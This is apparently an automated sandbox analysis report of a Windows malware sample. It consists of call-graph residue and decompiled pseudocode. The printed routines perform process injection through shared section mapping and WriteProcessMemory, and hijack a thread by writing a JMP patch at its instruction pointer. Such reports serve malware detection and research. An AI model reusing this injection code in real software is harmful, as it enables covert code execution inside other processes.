memset 11537->11538 11539 3469ff8 _vsnwprintf 11538->11539 11540 346a015 11539->11540 11540->11398 11544 346c986 GetTokenInformation 11541->11544 11545 346c9a8 GetLastError 11544->11545 11546 346c9c5 11544->11546 11545->11546 11547 346c9b3 11545->11547 11546->11458 11546->11459 11553 3468dc9 RtlAllocateHeap 11547->11553 11549 346c9bb 11549->11546 11550 346c9c9 GetTokenInformation 11549->11550 11550->11546 11551 346c9de 11550->11551 11552 3468ddf 2 API calls 11551->11552 11552->11546 11553->11549 11555 346c97c 11554->11555 11556 346c950 GetLastError 11554->11556 11555->11463 11555->11464 11556->11555 11557 346c95d OpenProcessToken 11556->11557 11557->11555 11560 3469abc 11559->11560 11562 3469ace 11559->11562 11563 3468dc9 RtlAllocateHeap 11560->11563 11562->11470 11563->11562 11565 3468f63 memset 11564->11565 11566 346c79a lstrcpynW 11565->11566 11568 3469f85 2 API calls 11566->11568 11569 346c7cf GetVolumeInformationW 11568->11569 11570 3468d9a 2 API calls 11569->11570 11571 346c804 11570->11571 11572 3469fe4 2 API calls 11571->11572 11573 346c825 lstrcatW 11572->11573 11577 346a5e9 11573->11577 11576 346c84b 11576->11480 11578 346a5f1 CharUpperBuffW 11577->11578 11578->11576 11580 34736e5 11579->11580 11581 3473718 lstrlenW 11580->11581 11582 3473735 _ftol2_sse 11581->11582 11582->11489 11585 3469868 11584->11585 11585->11585 11586 34736d5 2 API calls 11585->11586 11589 3469883 11586->11589 11587 34698b7 11587->11527 11588 34736d5 2 API calls 11588->11589 11589->11587 11589->11588 11591 346bb20 11590->11591 11592 346bb4b 11590->11592 11593 3468f63 memset 11591->11593 11592->11534 11594 346bb32 Process32First 11593->11594 11594->11592 11596 346bb59 11594->11596 11595 346bb7e FindCloseChangeNotification 11595->11592 11596->11595 11610 346daf2 11596->11610 11599 3469d3d 11598->11599 11613 3468dc9 RtlAllocateHeap 11599->11613 11602 3469e0c 11602->11528 11603 3469d95 11603->11602 11614 3468dc9 RtlAllocateHeap 11603->11614 11605 3469e6e 11604->11605 11608 3469e33 
[Execution graph residue: the rendered call-graph widget survives here only as a list of numbered node ids and edges (e.g. 11604->11608), which carries no readable structure. The Windows API names that appear as node labels in this fragment are kept below, grouped by family.]
Process creation and memory manipulation: CreateProcessW, GetThreadContext, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, NtClose
Module handling: LoadLibraryW, FreeLibrary, GetModuleHandleA, GetModuleHandleW, GetProcAddress
Window classes: RegisterClassExA, CreateWindowExA, DestroyWindow, UnregisterClassA
GDI / screen capture: GetDC, CreateCompatibleDC, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, BitBlt, GetCursorInfo, CopyIcon, GetIconInfo, GetObjectW, DrawIconEx, GetDIBits, DeleteDC, DeleteObject
File system: GetDriveTypeW, SetFileAttributesW, MoveFileW
Synchronisation, timing and process identity: CreateMutexW, Sleep, SetThreadPriority, SwitchToThread, GetSystemTimeAsFileTime, GetTickCount, _time64, GetCurrentProcessId
Heap and string helpers: RtlAllocateHeap, LocalAlloc, memset, lstrlenW, lstrcatW, lstrcatA, lstrcmpiW, lstrcpynW, lstrcpynA, MultiByteToWideChar, strncpy, _snprintf, strchr, qsort, localeconv, GetLastError
3471e81 14699->14700 14702 3471eba 14700->14702 14713 347200e 14700->14713 14702->14694 14704 34725f7 14703->14704 14705 3472641 14703->14705 14704->14705 14706 3472667 14704->14706 14707 3472613 14704->14707 14705->14696 14739 34723ec 14706->14739 14709 3472656 14707->14709 14710 3472618 14707->14710 14729 34724dd 14709->14729 14710->14705 14712 3472629 memchr 14710->14712 14712->14705 14716 3472028 14713->14716 14714 347204d 14714->14702 14715 34720e2 14715->14714 14720 347349a 14715->14720 14716->14714 14716->14715 14717 3472097 14716->14717 14719 34720a7 _errno _strtoi64 _errno 14717->14719 14719->14714 14726 34734fe localeconv 14720->14726 14723 34734d2 14724 34734e1 _errno 14723->14724 14725 34734ed 14723->14725 14724->14725 14725->14714 14727 34734a9 _errno strtod 14726->14727 14728 347350e strchr 14726->14728 14727->14723 14727->14724 14728->14727 14730 34711b3 7 API calls 14729->14730 14731 34724e9 14730->14731 14732 3471e6f 8 API calls 14731->14732 14738 347250b 14731->14738 14736 34724ff 14732->14736 14733 3472528 memchr 14733->14736 14733->14738 14734 34725e0 17 API calls 14734->14736 14735 34712d9 strncpy 14735->14736 14736->14733 14736->14734 14736->14735 14737 3471e6f 8 API calls 14736->14737 14736->14738 14737->14736 14738->14705 14740 34723f5 14739->14740 14741 3471e6f 8 API calls 14740->14741 14743 3472410 14740->14743 14744 3472408 14741->14744 14742 34725e0 18 API calls 14742->14744 14743->14705 14744->14742 14744->14743 14745 3471e6f 8 API calls 14744->14745 14745->14744 14746->14242 14748 3469fa5 2 API calls 14747->14748 14749 34669c7 14748->14749 14750 346e795 14749->14750 14751 3469f85 2 API calls 14750->14751 14752 346e7aa 14751->14752 14895 346e485 CoInitializeEx CoInitializeSecurity CoCreateInstance 14752->14895 14755 3468d9a 2 API calls 14756 346e7c2 14755->14756 14757 3469f85 2 API calls 14756->14757 14772 34669cc 14756->14772 14758 346e7d6 14757->14758 14759 3469f85 2 API calls 14758->14759 14760 346e7e7 14759->14760 14902 346e6d9 
SysAllocString SysAllocString 14760->14902 14762 346e826 14764 3468d9a 2 API calls 14762->14764 14763 346e7f8 14763->14762 14765 3469ab3 RtlAllocateHeap 14763->14765 14766 346e82f 14764->14766 14767 346e807 VariantClear 14765->14767 14769 3468d9a 2 API calls 14766->14769 14767->14762 14770 346e838 14769->14770 14908 346e539 14770->14908 14772->14249 14774 3469f85 2 API calls 14773->14774 14775 346e85b 14774->14775 14776 346e485 6 API calls 14775->14776 14777 346e865 14776->14777 14778 3468d9a 2 API calls 14777->14778 14779 346e873 14778->14779 14780 3466a80 14779->14780 14781 3469f85 2 API calls 14779->14781 14796 346e8fa 14780->14796 14782 346e887 14781->14782 14783 3469f85 2 API calls 14782->14783 14784 346e898 14783->14784 14785 346e6d9 10 API calls 14784->14785 14786 346e8a9 14785->14786 14787 346e8d7 14786->14787 14788 3469ab3 RtlAllocateHeap 14786->14788 14789 3468d9a 2 API calls 14787->14789 14790 346e8b8 VariantClear 14788->14790 14791 346e8e0 14789->14791 14790->14787 14792 3468d9a 2 API calls 14791->14792 14794 346e8e9 14792->14794 14795 346e539 2 API calls 14794->14795 14795->14780 14797 3469f85 2 API calls 14796->14797 14798 346e90f 14797->14798 14799 346e485 6 API calls 14798->14799 14800 346e919 14799->14800 14801 3468d9a 2 API calls 14800->14801 14802 346e927 14801->14802 14803 3466a88 14802->14803 14804 3469f85 2 API calls 14802->14804 14819 3468dc9 RtlAllocateHeap 14803->14819 14805 346e93b 14804->14805 14806 3469f85 2 API calls 14805->14806 14807 346e94c 14806->14807 14808 346e6d9 10 API calls 14807->14808 14809 346e95d 14808->14809 14810 346e98b 14809->14810 14812 3469ab3 RtlAllocateHeap 14809->14812 14811 3468d9a 2 API calls 14810->14811 14813 346e994 14811->14813 14814 346e96c VariantClear 14812->14814 14815 3468d9a 2 API calls 14813->14815 14814->14810 14817 346e99d 14815->14817 14818 346e539 2 API calls 14817->14818 14818->14803 14819->14262 14820->14265 14822 3468f63 memset 14821->14822 14823 346b87e 14822->14823 14824 3468f63 memset 
14823->14824 14825 346b88a 14824->14825 14826 346b9e2 14825->14826 14829 3466b0d 14825->14829 14913 3468dc9 RtlAllocateHeap 14825->14913 14828 3468ddf 2 API calls 14826->14828 14828->14829 14829->14271 14830 3469bfd 2 API calls 14832 346b8f9 14830->14832 14831 3469a76 RtlAllocateHeap 14831->14832 14832->14826 14832->14829 14832->14830 14832->14831 14833 3468ddf 2 API calls 14832->14833 14834 346b9a8 14832->14834 14833->14832 14834->14826 14835 3469b26 2 API calls 14834->14835 14836 346b9cb 14835->14836 14836->14826 14837 346b9d1 14836->14837 14838 3468ddf 2 API calls 14837->14838 14838->14829 14896 346e4ca SysAllocString 14895->14896 14897 346e507 14895->14897 14898 346e4e5 14896->14898 14897->14755 14898->14897 14899 346e4e9 CoSetProxyBlanket 14898->14899 14899->14897 14900 346e500 14899->14900 14912 3468dc9 RtlAllocateHeap 14900->14912 14903 3469f85 2 API calls 14902->14903 14904 346e704 SysAllocString 14903->14904 14905 3468d9a 2 API calls 14904->14905 14907 346e717 SysFreeString SysFreeString SysFreeString 14905->14907 14907->14763 14909 346e544 14908->14909 14910 3468ddf 2 API calls 14909->14910 14911 346e561 14910->14911 14911->14772 14912->14897 14913->14832 14925 3470542 GetTickCount 14924->14925 14926 3470531 __aulldiv 14924->14926 14925->14398 14926->14398 14928 34711b3 7 API calls 14927->14928 14929 3468156 14928->14929 14930 3468927 strncpy 14929->14930 14931 346816f 14930->14931 14932 3468927 strncpy 14931->14932 14933 3468183 14932->14933 14934 3468927 strncpy 14933->14934 14935 3468194 14934->14935 14936 3468927 strncpy 14935->14936 14937 34681a7 14936->14937 14938 3468927 strncpy 14937->14938 14939 34681bd 14938->14939 14940 3468927 strncpy 14939->14940 14941 34681d1 14940->14941 14942 3468927 strncpy 14941->14942 14943 34681ea 14942->14943 14944 3468927 strncpy 14943->14944 14945 34681fe 14944->14945 14946 3468927 strncpy 14945->14946 14947 3468212 14946->14947 14948 3468927 strncpy 14947->14948 14949 3468226 14948->14949 14950 3468927 strncpy 
14949->14950 14951 346823c 14950->14951 14952 3468927 strncpy 14951->14952 14953 3468253 14952->14953 15083 3468983 14953->15083 14956 3468927 strncpy 14957 3468266 14956->14957 14958 3468927 strncpy 14957->14958 14959 346827a 14958->14959 14960 3468927 strncpy 14959->14960 14961 346828e 14960->14961 14962 3468983 5 API calls 14961->14962 14963 3468296 14962->14963 14964 3468927 strncpy 14963->14964 14965 34682a1 14964->14965 14966 3468983 5 API calls 14965->14966 14967 34682a9 14966->14967 14968 3468927 strncpy 14967->14968 14969 34682b4 14968->14969 14970 3468983 5 API calls 14969->14970 14971 34682bc 14970->14971 14972 3468927 strncpy 14971->14972 14973 34682c7 14972->14973 14974 3468927 strncpy 14973->14974 14975 34682db 14974->14975 14976 3468983 5 API calls 14975->14976 14977 34682e3 14976->14977 14978 3468927 strncpy 14977->14978 14979 34682ee 14978->14979 14980 3468927 strncpy 14979->14980 14981 3468308 14980->14981 14982 3468983 5 API calls 14981->14982 14983 3468310 14982->14983 14984 3468927 strncpy 14983->14984 14985 346831b 14984->14985 14986 3468927 strncpy 14985->14986 14987 346832f 14986->14987 14988 3468927 strncpy 14987->14988 14989 3468343 14988->14989 14990 3468983 5 API calls 14989->14990 14991 3468357 14990->14991 14992 3468927 strncpy 14991->14992 14993 3468362 14992->14993 14994 3468927 strncpy 14993->14994 14995 3468376 14994->14995 14996 3468927 strncpy 14995->14996 14997 346838a 14996->14997 14998 3468983 5 API calls 14997->14998 14999 3468395 14998->14999 15000 3468927 strncpy 14999->15000 15001 34683a0 15000->15001 15002 3468983 5 API calls 15001->15002 15003 34683ab 15002->15003 15004 3468927 strncpy 15003->15004 15005 34683b6 15004->15005 15006 3468983 5 API calls 15005->15006 15007 34683c1 15006->15007 15008 3468927 strncpy 15007->15008 15009 34683cc 15008->15009 15010 3468983 5 API calls 15009->15010 15011 34683d7 15010->15011 15012 3468927 strncpy 15011->15012 15013 34683e2 15012->15013 15014 3468983 5 API calls 15013->15014 15015 
34683ed 15014->15015 15016 3468927 strncpy 15015->15016 15017 34683f8 15016->15017 15018 3468983 5 API calls 15017->15018 15019 3468403 15018->15019 15020 3468927 strncpy 15019->15020 15021 346840e 15020->15021 15022 3468983 5 API calls 15021->15022 15023 3468419 15022->15023 15024 3468927 strncpy 15023->15024 15088 3469b62 15083->15088 15085 346825b 15085->14956 15086 3468996 15086->15085 15087 3468ddf 2 API calls 15086->15087 15087->15085 15089 3469b71 WideCharToMultiByte 15088->15089 15090 3469bc1 15088->15090 15089->15090 15091 3469b8c 15089->15091 15090->15086 15097 3468dc9 RtlAllocateHeap 15091->15097 15093 3469b95 15093->15090 15094 3469b9d WideCharToMultiByte 15093->15094 15094->15090 15095 3469bb6 15094->15095 15096 3468ddf 2 API calls 15095->15096 15096->15090 15097->15093 15099 3469913 15098->15099 15100 34736d5 2 API calls 15099->15100 15101 346995d 15100->15101 15102 3467ae9 15101->15102 15103 34736d5 2 API calls 15101->15103 15102->14416 15103->15101 15105 34711b3 7 API calls 15104->15105 15106 3467f21 15105->15106 15107 3468927 strncpy 15106->15107 15108 3467f37 15107->15108 15109 3468927 strncpy 15108->15109 15110 3467f4c 15109->15110 15111 3468927 strncpy 15110->15111 15112 3467f60 15111->15112 15113 3468927 strncpy 15112->15113 15114 3467f75 15113->15114 15115 3468927 strncpy 15114->15115 15116 3467f86 15115->15116 15117 3468927 strncpy 15116->15117 15118 3467f9f 15117->15118 15119 3468927 strncpy 15118->15119 15120 3467fb5 15119->15120 15121 3468927 strncpy 15120->15121 15122 3467fc6 15121->15122 15123 3468927 strncpy 15122->15123 15124 3467fda 15123->15124 15125 3468927 strncpy 15124->15125 15126 3467fed 15125->15126 15127 3468927 strncpy 15126->15127 15128 3468001 15127->15128 15129 3468927 strncpy 15128->15129 15130 3468020 15129->15130 15131 3468983 5 API calls 15130->15131 15132 3468031 15131->15132 15133 3468927 strncpy 15132->15133 15134 346803c 15133->15134 15135 3468983 5 API calls 15134->15135 15136 346804d 15135->15136 15137 3468927 
strncpy 15136->15137 15138 3468058 15137->15138 15139 3468927 strncpy 15138->15139 15140 3468074 15139->15140 15141 3471c34 13 API calls 15140->15141 15142 346807c 15141->15142 15142->14420 15144 3471d21 18 API calls 15143->15144 15145 346795d 15144->15145 15146 346a06e memset 15145->15146 15149 3467969 15145->15149 15147 346799d 15146->15147 15147->15149 15177 3468dc9 RtlAllocateHeap 15147->15177 15149->14431 15150 3467a75 15151 3468ddf 2 API calls 15150->15151 15153 3467a86 15150->15153 15151->15150 15152 3467a21 15152->15149 15152->15150 15154 3469a76 RtlAllocateHeap 15152->15154 15155 3468ddf 2 API calls 15153->15155 15154->15152 15155->15149 15157 3467826 15156->15157 15158 346bfc8 2 API calls 15157->15158 15159 34678b6 15157->15159 15160 3467842 15158->15160 15159->14434 15159->14441 15160->15159 15161 346788e 15160->15161 15178 3468dc9 RtlAllocateHeap 15160->15178 15163 3468ddf 2 API calls 15161->15163 15165 34678ac 15163->15165 15164 346785f 15164->15161 15167 3469fa5 2 API calls 15164->15167 15166 3468ddf 2 API calls 15165->15166 15166->15159 15168 346787e 15167->15168 15179 3468bbb 15168->15179 15195 346808f 15170->15195 15172 34677db 15173 34676f8 19 API calls 15172->15173 15174 34677fb 15173->15174 15175 3468ddf 2 API calls 15174->15175 15176 3467806 15175->15176 15176->14441 15177->15152 15178->15164 15182 3468a4f 15179->15182 15189 34689b9 15182->15189 15184 3468a7c 15184->15161 15185 3468aa8 GetLastError 15188 3468b37 15185->15188 15187 3468ddf 2 API calls 15187->15184 15188->15187 15194 3468dc9 RtlAllocateHeap 15189->15194 15191 34689ca 15192 3468a1b lstrlenW 15191->15192 15193 3468a2c 15191->15193 15192->15193 15193->15184 15193->15185 15193->15188 15194->15191 15196 34711b3 7 API calls 15195->15196 15197 346809e 15196->15197 15198 3468927 strncpy 15197->15198 15199 34680b4 15198->15199 15200 3468927 strncpy 15199->15200 15201 34680c8 15200->15201 15202 3468927 strncpy 15201->15202 15203 34680d9 15202->15203 15204 3468927 strncpy 15203->15204 15205 
34680ea 15204->15205 15206 3468927 strncpy 15205->15206 15207 34680ff 15206->15207 15208 3468927 strncpy 15207->15208 15209 3468115 15208->15209 15210 3468927 strncpy 15209->15210 15211 346812b 15210->15211 15212 3471c34 13 API calls 15211->15212 15213 3468133 15212->15213 15213->15172 15214 34657a0 15219 346e565 15214->15219 15217 34657b5 GetLastError 15218 34657be 15217->15218 15244 3468dc9 RtlAllocateHeap 15219->15244 15221 346e57c 15222 3469ab3 RtlAllocateHeap 15221->15222 15241 34657b1 15221->15241 15223 346e591 15222->15223 15223->15241 15245 346a5fe 15223->15245 15226 3469f85 2 API calls 15227 346e5af 15226->15227 15228 3469fe4 2 API calls 15227->15228 15229 346e5c4 15228->15229 15230 3468d9a 2 API calls 15229->15230 15231 346e5cd 15230->15231 15253 346e3b5 15231->15253 15233 346e5d7 15234 346e5de 15233->15234 15260 346e3f9 15233->15260 15236 3468ddf 2 API calls 15234->15236 15237 346e6b1 15236->15237 15238 3468ddf 2 API calls 15237->15238 15239 346e6bc 15238->15239 15240 3468ddf 2 API calls 15239->15240 15240->15241 15241->15217 15241->15218 15242 346e5ed 15242->15234 15243 346e684 lstrlenW 15242->15243 15243->15242 15244->15221 15246 346a617 15245->15246 15247 3468e5d 3 API calls 15246->15247 15251 346a717 15246->15251 15252 346a692 15246->15252 15247->15252 15248 346a6ef 15249 3468f63 memset 15248->15249 15248->15251 15249->15251 15250 3468ecb lstrlenW 15250->15252 15251->15226 15252->15248 15252->15250 15254 3469f85 2 API calls 15253->15254 15255 346e3c7 15254->15255 15256 3469eab 4 API calls 15255->15256 15257 346e3d1 15256->15257 15258 3468d9a 2 API calls 15257->15258 15259 346e3dc 15258->15259 15259->15233 15261 3469c50 2 API calls 15260->15261 15262 346e412 CoInitializeEx 15261->15262 15263 3469f85 2 API calls 15262->15263 15264 346e42d 15263->15264 15265 3469f85 2 API calls 15264->15265 15266 346e43e 15265->15266 15267 3468d9a 2 API calls 15266->15267 15268 346e45a 15267->15268 15269 3468d9a 2 API calls 15268->15269 15270 346e470 15269->15270 15271 
3468ddf 2 API calls 15270->15271 15272 346e47b 15271->15272 15272->15242 13469 3461e2a 13470 3461e47 13469->13470 13482 3461e42 13469->13482 13483 3469ca5 13470->13483 13472 3468ddf 2 API calls 13474 3461ea0 13472->13474 13476 3469e22 2 API calls 13474->13476 13475 3469b26 2 API calls 13477 3461e63 13475->13477 13478 3461eac 13476->13478 13479 346b787 2 API calls 13477->13479 13477->13482 13480 3461e78 13479->13480 13481 3468ddf 2 API calls 13480->13481 13481->13482 13482->13472 13485 3469cbc 13483->13485 13490 3468dc9 RtlAllocateHeap 13485->13490 13486 3461e50 13486->13475 13486->13482 13487 3469cfd lstrcatA 13488 3469d11 lstrcatA 13487->13488 13489 3469cf2 13487->13489 13488->13489 13489->13486 13489->13487 13490->13489 12965 3466438 12966 3466448 ExitProcess 12965->12966

            Control-flow Graph

            C-Code - Quality: 95%
            			E0346D538(void* __ecx, intOrPtr __edx) {
            				void* _v8;
            				void* _v12;
            				void* _v16;
            				void* _v20;
            				long _v24;
            				long _v28;
            				short _v32;
            				char _v36;
            				intOrPtr* _v40;
            				intOrPtr _v44;
            				long _v48;
            				void* _v52;
            				void* _v53;
            				char _v64;
            				short _v68;
            				struct _WNDCLASSEXA _v116;
            				char _t81;
            				intOrPtr* _t83;
            				intOrPtr _t87;
            				intOrPtr _t90;
            				char _t97;
            				short _t98;
            				intOrPtr _t105;
            				long _t107;
            				char _t119;
            				void* _t124;
            				struct HWND__* _t132;
            				void* _t138;
            				void* _t147;
            				void* _t154;
            				intOrPtr _t155;
            				intOrPtr _t157;
            				void* _t158;
            				void* _t163;
            				void* _t165;
            
            				_t81 =  *0x347f8d4; // 0x50ffc00
            				_t138 = 0;
            				_v12 = __ecx;
            				_t157 = __edx;
            				_v20 = 0;
            				_v52 = 0;
            				_v48 = 0;
            				_v16 = 0;
            				_v8 = 0;
            				_v24 = 0;
            				_v44 = __edx;
            				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
            					E0346F15B(0x1f4);
            				}
            				_t12 = _t157 + 0x3c; // 0x852c50ff
            				_t83 =  *_t12 + _t157;
            				_v28 = _t138;
            				_v40 = _t83;
            				if( *_t83 != 0x4550) {
            					L14:
            					_t158 = _v12;
            					L15:
            					if(_v8 != _t138) {
            						_t90 =  *0x347f9d0; // 0x50ffa00
            						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
            						_v8 = _t138;
            					}
            					L17:
            					if(_v16 != 0) {
            						_t87 =  *0x347f8d0; // 0x50ff8c0
            						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
            					}
            					if(_v20 != 0) {
            						NtClose(_v20);
            					}
            					return _v8;
            				}
            				_v52 =  *((intOrPtr*)(_t83 + 0x50));
            				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
            					goto L14;
            				}
            				_t97 =  *"18293"; // 0x39323831
            				_v36 = _t97;
            				_t98 =  *0x347ce70; // 0x33
            				_v32 = _t98;
            				_v116.lpszClassName =  &_v64;
            				asm("movsd");
            				_v116.lpfnWndProc = DefWindowProcW;
            				_v116.cbWndExtra = _t138;
            				asm("movsd");
            				_v116.style = 0xb;
            				_v116.lpszMenuName = _t138;
            				_v116.cbSize = 0x30;
            				asm("movsb");
            				_v116.cbClsExtra = _t138;
            				_v116.hInstance = _t138;
            				if(RegisterClassExA( &_v116) != 0) {
            					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
            					if(_t132 != 0) {
            						DestroyWindow(_t132);
            						UnregisterClassA( &_v64, _t138);
            					}
            				}
            				_t105 =  *0x347f8d0; // 0x50ff8c0
            				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
            				_t158 = _v12;
            				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
            					goto L15;
            				} else {
            					_t154 = E03468E2E( *0x347f8d4, 0x1ac4);
            					_v36 = _t154;
            					if(_t154 == 0) {
            						goto L15;
            					}
            					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
            					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
            					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
            					E03468DDF( &_v36, 0x1ac4);
            					_t119 =  *0x347f8d4; // 0x50ffc00
            					_t155 =  *0x347f8e8; // 0x3460000
            					_v36 = _t119;
            					 *0x347f8e8 = _v8;
            					 *0x347f8d4 = _t163;
            					E03468EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
            					E0346D4B7(_v16, _v8, _v44);
            					_t124 = E0346A5D0("Jjischug");
            					_v53 = _t138;
            					_t147 = 0xf;
            					if(_t124 > _t147) {
            						do {
            							L12:
            							_t63 = _t138 + 0x41; // 0x41
            							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
            							_t138 = _t138 + 1;
            						} while (_t138 < _t147);
            						L13:
            						lstrlenW( &_v68);
            						 *0x347f8e8 = _t155;
            						 *0x347f8d4 = _v36;
            						goto L17;
            					}
            					_t147 = _t124;
            					if(_t147 == 0) {
            						goto L13;
            					}
            					goto L12;
            				}
            			}

            APIs
            • NtCreateSection.NTDLL(0346DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0346D5AA
            • RegisterClassExA.USER32(?), ref: 0346D5FE
            • CreateWindowExA.USER32 ref: 0346D629
            • DestroyWindow.USER32(00000000), ref: 0346D634
            • UnregisterClassA.USER32 ref: 0346D63F
            • NtMapViewOfSection.NTDLL(0346DA07,00000000), ref: 0346D66A
            • NtMapViewOfSection.NTDLL(0346DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0346D691
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0346D6D7
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0346D6F1
              • Part of subcall function 03468DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03468E25
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,03466297), ref: 0346D769
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0346D7B1
            • NtClose.NTDLL(00000000), ref: 0346D7C5
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: fab813ecea1b6bea278badf521be0876d8f24a1e0b8c4249bb12106af82324ce
            • Instruction ID: 2e7546cebf057e2d18bd3e17f384502caadd1f3164d93ccd1b7faaebb10d700e
            • Opcode Fuzzy Hash: fab813ecea1b6bea278badf521be0876d8f24a1e0b8c4249bb12106af82324ce
            • Instruction Fuzzy Hash: 018106B5E00219AFDB10EF95D884EEEBBF8FF09705F18406AE505BB254D770A904CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            C-Code - Quality: 100%
            			E0346D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
            				long _v8;
            				long _v12;
            				void* _v16;
            				intOrPtr _v23;
            				void _v24;
            				long _v28;
            				struct _CONTEXT _v744;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t33;
            				void* _t57;
            				long _t59;
            				void* _t62;
            				void** _t65;
            				void* _t66;
            
            				_t65 = __edx;
            				_t57 = __ecx;
            				_t66 = 0;
            				if(E0346D309(__ecx, __edx, __edx, 0) != 0) {
            					_t33 = E0346D538( *((intOrPtr*)(__edx)), _a4); // executed
            					_t66 = _t33;
            					if(_t66 != 0) {
            						E03468F63( &_v744, 0, 0x2cc);
            						_v744.ContextFlags = 0x10002;
            						if(GetThreadContext(_t65[1],  &_v744) != 0) {
            							_t62 = _v744.Eax;
            							_v12 = _v12 & 0x00000000;
            							_v24 = 0xe9;
            							_t59 = 5;
            							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
            							_v8 = _t59;
            							_v16 = _t62;
            							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
            								L6:
            								_t66 = 0;
            							} else {
            								_v28 = _v28 & 0x00000000;
            								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
            									goto L6;
            								}
            							}
            						}
            					}
            				}
            				E0346D47C();
            				return _t66;
            			}


            APIs
              • Part of subcall function 0346D309: LoadLibraryW.KERNEL32 ref: 0346D403
              • Part of subcall function 0346D538: NtCreateSection.NTDLL(0346DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0346D5AA
              • Part of subcall function 0346D538: RegisterClassExA.USER32(?), ref: 0346D5FE
              • Part of subcall function 0346D538: CreateWindowExA.USER32 ref: 0346D629
              • Part of subcall function 0346D538: DestroyWindow.USER32(00000000), ref: 0346D634
              • Part of subcall function 0346D538: UnregisterClassA.USER32 ref: 0346D63F
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0346DA40
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0346DA89
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0346DAA6
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0346DAC7
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: e94883bdee05786e42cdfae9c2d33883d3d62d2eb0e2f82ebba3c55824289ae2
            • Instruction ID: dd3490c1eee031327a65cc25f38134087a001c810e9b3ddf91678d476980a717
            • Opcode Fuzzy Hash: e94883bdee05786e42cdfae9c2d33883d3d62d2eb0e2f82ebba3c55824289ae2
            • Instruction Fuzzy Hash: C7313E76A0010AAFDB11DFA9CD44FEEBBBCEF08210F1441A6E505EA254D770EA44CB95
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 79%
            			E0346DFC2(void* __fp0) {
            				char _v8;
            				char _v12;
            				char _v16;
            				char _v144;
            				char _v656;
            				char _v668;
            				char _v2644;
            				void* __esi;
            				struct _OSVERSIONINFOA* _t68;
            				intOrPtr _t70;
            				void* _t71;
            				intOrPtr _t73;
            				void* _t74;
            				intOrPtr _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr _t80;
            				intOrPtr _t81;
            				intOrPtr _t87;
            				int _t90;
            				intOrPtr _t92;
            				void* _t93;
            				void* _t97;
            				intOrPtr _t99;
            				intOrPtr _t101;
            				short _t106;
            				char _t108;
            				intOrPtr _t113;
            				intOrPtr _t116;
            				intOrPtr _t119;
            				intOrPtr _t123;
            				intOrPtr _t134;
            				intOrPtr _t136;
            				intOrPtr _t138;
            				intOrPtr _t141;
            				intOrPtr _t143;
            				intOrPtr _t148;
            				void* _t149;
            				WCHAR* _t150;
            				char* _t151;
            				intOrPtr _t162;
            				intOrPtr _t177;
            				void* _t191;
            				struct _OSVERSIONINFOA* _t192;
            				void* _t193;
            				void* _t195;
            				char _t198;
            				void* _t199;
            				char* _t200;
            				void* _t203;
            				int* _t204;
